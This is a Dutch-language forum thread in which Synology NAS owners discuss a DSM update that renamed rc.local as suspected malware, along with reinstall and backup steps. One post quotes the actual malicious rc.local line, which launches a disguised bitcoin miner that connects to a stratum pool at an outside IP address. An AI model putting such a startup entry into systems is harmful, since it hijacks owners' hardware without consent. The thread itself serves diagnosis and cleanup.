Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware

[JSSL]

Beste forumleden,

Ik heb zojuist ook de NAS geupgrade naar 5.0-4528. Nu kreeg ik na de update een melding dat rc.local is renamed naar rc.local.bak vanwege mogelijke malware.
Ik kan zo snel niks hierover vinden op google.

Iemand enig idee, kan op het moment namelijk nog niet ssh gebruiken i.v.m. het onderweg zijn

Mvg,
Jarno

[Ben(V)]

In de releasenotes staat:

This hotfix will remove the current known malware on your Synology NAS.

Ik vermoed dat hij die rc.local als potentiele malware ziet.
Als je iets in rc.local stopt wordt dat bij het init process van linux opgestart.

Synology gebruikt bij mijn weten geen rc.local dus zal het wel als malware aangemerkt worden.
Het kan natuurlijk dat een legitiem package dit gedaan heeft maar is eigenlijk niet gebruikelijk voor applicaties daar iets in te zetten.
Gewoon even met Winscp erin kijken wat hij opstart.

PS. Op geen van mijn Synologies is een rc.local aanwezig.

[JSSL]

Ben, Bedankt voor je reactie! Ik heb toch maar even met een omweg ssh gebruikt naar de desbetreffende Synology. Wat blijkt, het is nog een bitcoin miner van februari
Dit stond er in de rc.local: /var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3340

Is het verstandig om DSM opnieuw te installeren met behoud van de bestanden of is dit al voldoende?

[Ben(V)]

Dit is wel voldoende om van die miner af te komen maar hij staat nog steeds ergens op je NAS.
Ook begreep ik dat die miner de resource monitor verving om geen 100% cpu te tonen.

Persoonlijk zou ik DSM er opnieuw opzetten, maar kan natuurlijk niet zien hoeveel ongemak dat voor jou oplevert.

[JSSL]

Ik heb nog gezocht naar de bekende mappen die met deze bitcoinminer er moesten zijn. Daarnaast is er ook geen proces te zien die mined. Net of dit alles al is verwijderd door Synology's update..

[Ben(V)]

Dat zeggen ze eigenlijk wel he.

[Birdy]

Net of dit alles al is verwijderd door Synology's update..

Mooi plus punt van deze update 

[JSSL]

Als ik DSM er opnieuw op zet, kan ik dan alle instellingen terug zetten met de configuration backup? En werkt het dan eigenlijk hetzelfde als nu? Nog geen ervaring met de synology resetten namelijk
Synology is namelijk zelf niet zeker in hoeverre het na de update verwijderd is..

[Hofstede]

Je kunt inderdaad de configuratie backuppen en dan na herinstallatie van DSM terugzetten. Dit werkt alleen niet voor de packages, die moet je opnieuw installeren en configureren.
Let wel op dat je de procedure uitvoert via de reset-knop en niet via DSM->Terug naar fabrieksinstellingen. Als je de laatste gebruikt wist de NAS ook al je data.

[JSSL]

Dienen de foto's ook uit de map photo gehaald te worden of overschrijft Photostation die map niet bij het installeren van dat pakket?

[Hofstede]

Nee, data blijft gewoon staan. Het is wel aan te bevelen om een backup te maken voor herinstallatie, het kan tenslotte onverwacht fout gaan (eigenlijk hoor je sowieso een backup van je NAS te hebben). Met de backup functie van de NAS kun je ook de PhotoStation database backuppen. Die kun je dan na herinstallatie terugzetten, dan hoeft PhotoStation niet alles opnieuw te indexeren.

[kuba]

In de releasenotes staat:

This hotfix will remove the current known malware on your Synology NAS.

Ik vermoed dat hij die rc.local als potentiele malware ziet.
Als je iets in rc.local stopt wordt dat bij het init process van linux opgestart.

Synology gebruikt bij mijn weten geen rc.local dus zal het wel als malware aangemerkt worden.
Het kan natuurlijk dat een legitiem package dit gedaan heeft maar is eigenlijk niet gebruikelijk voor applicaties daar iets in te zetten.
Gewoon even met Winscp erin kijken wat hij opstart.

PS. Op geen van mijn Synologies is een rc.local aanwezig.

Hallo, ik zag dit bericht een tikkeltje laat, maar ik moet hier even opmerken dat /etc/rc.local op zich geen ongebruikelijk iets is. Op mijn systeem bestaat hij. Ik kan me in ieder geval niet herinneren dat ik dit bestand ooit zelf heb aangemaakt. Ik denk dat hij bij de installatie van iPKG meekwam.
Dit staat erin:

Code: [Selecteer]

#!/bin/sh

# Optware setup
[ -x /etc/rc.optware ] && /etc/rc.optware start

exit 0
Bij mij is de rc.local tijdens de update met rust gelaten. DSM update scant zo te horen dus actief op de inhoud van de rc.local. En dat is een geruststellend idee. ik begin die Syno steeds beter te vinden. :-)

[Birdy]

DAT is dan weer vreemd, zou hetzelfde verwachten bij jou als wat TS gebeurde. 

[kuba]

Ik heb mijn pst hierboven even aangevuld met een extra opmerking: DSM update scant m.i. op de inhoud van /etc/rc.local, niet op het bestaan van het bestand zelf.  De inhoud van mijn rc.local is -zoals je ziet- tamelijk onschuldig.

[Birdy]

@JSSL
Dan zou ik wel eens willen zien wat er in rc.local.bak staat.